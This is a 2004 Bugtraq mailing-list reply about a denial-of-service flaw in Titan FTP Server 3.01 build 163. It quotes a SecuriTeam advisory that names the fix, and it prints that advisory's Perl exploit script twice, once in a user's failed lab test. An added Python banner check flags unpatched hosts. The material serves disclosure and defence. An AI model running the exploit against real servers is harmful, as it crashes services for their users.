Message-ID: <6.0.0.22.2.20040506191900.01dfaf68@www.cjkcode.com>
Date: Thu, 06 May 2004 19:19:59 -0700
From: Gene Ken <gken@....sina.com>
To: Aviram Jenik <aviram@...ondsecurity.com>
Cc: bugtraq@...urityfocus.com
Subject: Re: Titan FTP Server Aborted LIST DoS
Hi Aviram,
I have some trouble testing the current exploit; below is my test procedure:
1) In my test bed, the host side is WinXP Professional with ip_addr 192.168.0.2
(English, 5.1 build 2600), and the client side is Red Hat Linux 9 using NAT in
VMware Workstation 4.5.1 build-7568 with ip_addr 192.168.92.3.
2) I have successfully installed Titan FTP Server v3.01 Build 163 on the WinXP Pro
platform. Also, the Perl script you mentioned in your article has successfully
executed, as shown below:
/* On my Red Hat box, I use ftp to verify whether the Titan FTP server is
running; the result is the info below: */
[gken@rh9 gken]$ ftp 192.168.0.2
Connected to 192.168.0.2 (192.168.0.2).
220 Titan FTP Server 3.01.163 Ready.
Name (192.168.0.2:gken): gken
331 User name okay, need password.
Password:
230-Welcome gken from 192.168.0.2. You are now logged in to the server.
230 User logged in, proceed.
Remote system type is UNIX.
Using binary mode to transfer files.
/* executing titan.pl script */
[gken@rh9 gken]$ perl titan.pl
Combination:
cannot connect to ftp daemon on 192.168.0.2 at titan.pl line 22.
How to tackle this? Thanks in advance!
---the titan.pl---
#!/usr/bin/perl
# Test for Titan FTP server security vulnerability
#
# Orkut users? Come join the SecuriTeam community
# http://www.orkut.com/Community.aspx?cmm=44441
#
use IO::Socket;
$host = "192.168.0.2";
my @combination;
$combination[0] = "LIST \r\n";
for (my $i = 0; $combination[$i] ; $i++)
{
    print "Combination: $1\n";
    $remote = IO::Socket::INET->new ( Proto => "tcp",
                                      PeerAddr => $host,
                                      PeerPort => "2112",
                                    );
    unless ($remote) { die "cannot connect to ftp daemon on $host" }
    print "connected\n";
    while (<$remote>)
    {
        print $_;
        if (/220 /)
        {
            last;
        }
    }
    $remote->autoflush(1);
    my $ftp = "USER anonymous\r\n";
    print $remote $ftp;
    print $ftp;
    while (<$remote>)
    {
        print $_;
        if (/331 /)
        {
            last;
        }
    }
    $ftp = "PASS a\@b.com\r\n";
    print $remote $ftp;
    print $ftp;
    while (<$remote>)
    {
        print $_;
        if (/230 /)
        {
            last;
        }
    }
    $ftp = $combination[$i];
    print $remote $ftp;
    print $ftp;
    while (<$remote>)
    {
        print $_;
        if (/150 /)
        {
            last;
        }
        close $remote;
    }
}
At 05:51 AM 5/5/2004, you wrote:
> Titan FTP Server Aborted LIST DoS
>----------------------------------------------------
>
>
>Article reference:
>http://www.securiteam.com/windowsntfocus/5RP0215CUU.html
>
>
>SUMMARY
>
>A security vulnerability exists in South River Technologies' Titan FTP
>Server.
>An attacker issuing a LIST command and disconnecting before the LIST command
>had the time to connect, will cause the program to try and access an invalid
>socket. This will result in the FTP service's crash (and in turn, no longer
>being able to service any additional users).
>
>
>DETAILS
>
>Vulnerable Systems:
> * Titan FTP Server version 3.01 build 163
>
> Immune Systems:
> * Titan FTP Server version 3.10 build 169
>
> Solution:
> To solve this issue upgrade to the latest version (3.10 build 169 or newer).
>
> Exploit:
> #!/usr/bin/perl
> # Test for Titan FTP server security vulnerability
> #
> # Orkut users? Come join the SecuriTeam community
> # http://www.orkut.com/Community.aspx?cmm=44441
> #
> use IO::Socket;
>
> $host = "192.168.1.243";
>
> my @combination;
> $combination[0] = "LIST \r\n";
>
> for (my $i = 0; $combination[$i] ; $i++)
> {
> print "Combination: $1\n";
>
> $remote = IO::Socket::INET->new ( Proto => "tcp",
> PeerAddr => $host,
> PeerPort => "2112",
> );
> unless ($remote) { die "cannot connect to ftp daemon on $host" }
>
> print "connected\n";
> while (<$remote>)
> {
> print $_;
> if (/220 /)
> {
> last;
> }
> }
>
> $remote->autoflush(1);
>
> my $ftp = "USER anonymous\r\n";
>
> print $remote $ftp;
> print $ftp;
>
> while (<$remote>)
> {
> print $_;
> if (/331 /)
> {
> last;
> }
> }
>
> $ftp = "PASS a\@b.com\r\n";
> print $remote $ftp;
> print $ftp;
>
> while (<$remote>)
> {
> print $_;
> if (/230 /)
> {
> last;
> }
> }
>
> $ftp = $combination[$i];
>
> print $remote $ftp;
> print $ftp;
>
> while (<$remote>)
> {
> print $_;
> if (/150 /)
> {
> last;
> }
>
>
> close $remote;
> }
>
>
>ADDITIONAL INFORMATION
>
>SecurITeam would like to thank <mailto:storm@...uriteam.com> STORM for
>finding this vulnerability.
>
>
>
>
>Regards,
>Aviram Jenik
>Beyond Security Ltd.
>
>http://www.BeyondSecurity.com
>http://www.SecuriTeam.com
>
>The First Integrated Network and Web Application Vulnerability Scanner:
>http://www.beyondsecurity.com/webscan-wp.pdf
>
>
>
>
>====================
>====================
>
>DISCLAIMER:
>The information in this bulletin is provided "AS IS" without warranty of any
>kind.
>In no event shall we be liable for any damages whatsoever including direct,
>indirect, incidental, consequential, loss of business profits or special
>damages.
Regards,
Gene Ken
86-10-62928315 (Home)
86-13901016339 (Cell)
/* Out of intense complexities, emerge intense simplicities. */
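
An added example, not part of the original message or the advisory: a check that classifies FTP greetings against the fixed release the advisory names (3.10 build 169), using the banner format shown in the session above. The inventory is constructed, and the code assumes the fixed build reports itself in the same major.minor.build form as 3.01.163.

```python
import re

# Fixed release named in the advisory: "3.10 build 169 or newer".
FIXED = (3, 10, 169)

# Banner shape taken from the session quoted in this message:
#   "220 Titan FTP Server 3.01.163 Ready."
# Assumption: other builds use the same major.minor.build layout.
BANNER_RE = re.compile(r"^220[ -].*?Titan FTP Server (\d+)\.(\d+)\.(\d+)\b")


def parse_titan_version(greeting):
    """Return (major, minor, build) from an FTP greeting, or None if absent.

    Handles multi-line 220 replies by scanning every line of the greeting.
    """
    for line in greeting.splitlines():
        match = BANNER_RE.match(line.strip())
        if match:
            return tuple(int(part) for part in match.groups())
    return None


def classify(greeting):
    """Map a greeting to an audit verdict."""
    version = parse_titan_version(greeting)
    if version is None:
        # Another product, or a customised banner: needs a manual check.
        return "not-titan-or-banner-hidden"
    return "upgrade-required" if version < FIXED else "fixed"


def audit(inventory):
    """Classify every host -> greeting pair in an inventory dict."""
    return {host: classify(banner) for host, banner in inventory.items()}


# Constructed inventory (host names and the non-Titan banner are made up).
SAMPLE = {
    "ftp-a": "220 Titan FTP Server 3.01.163 Ready.\r\n",
    "ftp-b": "220 Titan FTP Server 3.10.169 Ready.\r\n",
    "ftp-c": "220-Welcome\r\n220 Titan FTP Server 3.01.163 Ready.\r\n",
    "ftp-d": "220 Example FTP service ready.\r\n",
}

if __name__ == "__main__":
    for host, verdict in sorted(audit(SAMPLE).items()):
        print(host, verdict)
```

A banner can be edited or suppressed by the administrator, so a "not-titan-or-banner-hidden" verdict means the installed build still has to be confirmed on the host itself.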